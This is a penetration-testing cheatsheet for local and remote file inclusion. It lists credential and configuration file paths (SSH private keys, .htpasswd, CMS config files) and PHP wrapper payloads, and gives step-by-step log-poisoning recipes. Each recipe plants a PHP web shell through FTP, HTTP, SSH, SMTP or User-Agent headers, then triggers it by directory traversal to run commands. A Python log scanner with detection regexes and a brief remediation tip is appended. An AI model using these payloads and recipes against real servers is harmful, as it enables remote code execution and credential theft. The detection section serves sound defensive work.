LFI / RFI Cheatsheet

Passwords, Credentials, PHP Wrappers & Log Poisoning

Andy Gregg
Mar 5, 2021

Passwords & Credentials

SSH

/var/lib/username/.ssh/id_rsa
/home/username/.ssh/id_rsa

Apache

/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd/access_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/httpd/error_log
/etc/apache2/htpasswd
/etc/apache2/.htpasswd
/etc/apache/.htpasswd
/etc/apache2/apache2.conf

CMS

WordPress: /var/www/html/wp-config.php
Joomla: /var/www/configuration.php
Dolphin: /var/www/html/inc/header.inc.php
Drupal: /var/www/html/sites/default/settings.php

XAMPP

C:/xampp/security/webdav.htpasswd
C:/xampp/apache/conf/httpd.conf
C:/xampp/apache/logs/access.log

PHP Wrapper

php://filter/convert.base64-encode/resource=

file=expect://whoami

php://input&cmd=whoami

Log Poisoning

FTP

Firstly, you need to be able to access:

../../../../../../../../var/log/vsftpd.log

If this is possible, attempt to log in:

ftp 192.168.x.x

Supply the following name:

Name: <?php system($_GET['cmd']); ?>

Exit and attempt the below execution:

../../../../../../../../var/log/vsftpd.log&cmd=whoami

Apache2 I

Firstly, you need to be able to access:

../../../../../../../../var/log/apache2/access.log

If this is possible, attempt to poison:

nc 192.168.xx.xx 80

Enter the following and press enter:

<?php system($_GET['cmd']); ?>

Exit and attempt the below execution:

../../../../../../../../var/log/apache2/access.log&cmd=whoami

Apache2 II

Firstly, you need to be able to access:

../../../../../../../../var/log/apache2/access.log

If this is possible, attempt to poison within the User-Agent:

<?php system($_GET['cmd']); ?>

Exit and attempt the below execution:

../../../../../../../../var/log/apache2/access.log&cmd=whoami

SSH

Firstly, you need to be able to access:

../../../../../../../../var/log/auth.log

Attempt to login using the following:

ssh '<?php echo system($_GET["cmd"]); exit; ?>'@192.168.x.x

Exit and attempt the below execution:

../../../../../../../../var/log/auth.log&cmd=whoami

Nginx

Firstly, you need to be able to access:

../../../../../../../../var/log/nginx/access.log

Attempt to inject the following:

http://192.168.x.x/file.php?file=<?php system($_GET['cmd']); ?>

Attempt the below execution:

../../../../../../../../var/log/nginx/error.log&cmd=whoami

Environ

Firstly, you need to be able to access:

../../../../../../../../proc/self/environ

If this is possible, attempt to poison within the User-Agent:

<?php system($_GET['cmd']); ?>

Exit and attempt the below execution:

../../../../../../../../proc/self/environ&cmd=whoami

SMTP

Get username first (/etc/passwd)

telnet 192.168.x.x 25

Enter the following:

EHLO andy

VRFY username@localhost

mail from: andy@hack.com

rcpt to: username@localhost

data

Subject: owned

<?php echo system($_REQUEST['cmd']); ?>

Press Enter.

dot (.)

Press Enter.

Exit and attempt the below execution:

../../../../../../../../var/mail/username&cmd=whoami
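
Detection

Every technique above leaves traces in the web server's own access log. The following is an added example, not part of the original cheatsheet: a Python scan of combined-format log lines for the traversal sequences, wrapper schemes, sensitive paths and PHP open tags listed on this page. The rule names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Rules derived from the paths, wrappers and payload shape listed on this page.
RULES = {
    "php_tag": re.compile(r"<\?(php|=)", re.I),
    "php_wrapper": re.compile(r"(php://(filter|input)|expect://)", re.I),
    "traversal": re.compile(r"(\.\./){2,}"),
    "sensitive_path": re.compile(
        r"(/var/log/|/proc/self/environ|/var/mail/|\.ssh/id_rsa|\.htpasswd|wp-config\.php)",
        re.I,
    ),
}

def decode(text, rounds=3):
    """URL-decode repeatedly so double-encoded traversal (%252F) is still seen."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan(lines):
    """Return (line_number, client_ip, matched_rule_names) for each suspicious line."""
    findings = []
    for number, line in enumerate(lines, 1):
        client_ip = line.split(" ", 1)[0]
        text = decode(line)
        hits = sorted(name for name, rule in RULES.items() if rule.search(text))
        if hits:
            findings.append((number, client_ip, hits))
    return findings

# Constructed sample lines in combined log format (documentation IP ranges).
SAMPLE = [
    '192.0.2.10 - - [05/Mar/2021:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.66 - - [05/Mar/2021:10:00:02 +0000] "GET /file.php?file=..%2F..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Faccess.log&cmd=whoami HTTP/1.1" 200 9001 "-" "curl/7.68.0"',
    '192.0.2.66 - - [05/Mar/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php echo 1; ?>"',
    '192.0.2.77 - - [05/Mar/2021:10:00:04 +0000] "GET /file.php?file=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.5 - - [05/Mar/2021:10:00:05 +0000] "GET /file.php?file=..%252F..%252F..%252Fproc%252Fself%252Fenviron HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, ip, hits in scan(SAMPLE):
        print(f"line {number}: {ip} -> {', '.join(hits)}")
```

A PHP open tag anywhere in a log line (line 3, in the User-Agent) is the log-poisoning signal; a traversal to a log, mail spool or /proc path is the follow-up read. Alerting does not replace fixing the include itself: map the file parameter to a fixed allow-list of files rather than passing user input to include.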
